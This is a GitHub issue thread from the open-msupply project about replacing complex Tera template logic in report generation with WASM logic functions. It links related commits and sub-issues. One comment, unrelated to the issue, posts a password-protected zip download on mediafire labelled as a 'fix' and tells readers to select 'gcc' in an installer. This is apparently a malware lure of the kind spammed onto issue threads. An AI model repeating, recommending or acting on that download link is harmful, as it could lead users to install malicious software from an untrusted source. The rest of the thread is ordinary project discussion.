### ISSUE TITLE
Report logic functions

### ISSUE THREAD

**Issue by andreievg** [msupply-foundation/open-msupply#4701]
## Is your feature request related to a problem? Please describe 👀

So far report generation consist of two sequential parts, queries and then tera template formatting query results. We are doing quite a lot of data manipulation in tera, which would become hard to maintain. There is also a requirement to sort by columns that would be very hard to do (in cases where multiple queries are joined by queries or when data is generated by tera or when using graphql loaders).

Some examples: 

[Combining queries](https://github.com/msupply-foundation/open-msupply-reports/blob/362c7ae57384686283d4ad3104b8fa36ef3ab7b8/standard-reports/item-usage/src/template.html#L43-L45)

[Complex conditions](https://github.com/msupply-foundation/open-msupply-reports/blob/362c7ae57384686283d4ad3104b8fa36ef3ab7b8/standard-reports/expiring-items/src/template.html#L71C10-L96C22)

This can be improved a lot by using WASM logic functions: https://github.com/msupply-foundation/open-msupply/commit/c5ce9ad541bdca4f351ac8e55d07b802f581478f, https://github.com/msupply-foundation/open-msupply-reports/commit/07e40158ad2b4cd6b637154411303b193aaca48b.

Current requirements:

* https://github.com/msupply-foundation/open-msupply/issues/4702
* Simplify [conditional logic](https://github.com/msupply-foundation/open-msupply-reports/blob/362c7ae57384686283d4ad3104b8fa36ef3ab7b8/standard-reports/expiring-items/src/template.html#L71C10-L96C22) in this report. Check other reports for excessive logic for candidacy
* WASM function should be compatible with extra data added (this would definitely require report versioning, see epic)

Future requirements:

* Being able to compile and run SQL queries for more complex use cases (for example where time series needs to be generated), for now we just need to have an example of way forward with this

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by roxy-dao** [comment]
Broken down issues have been merged
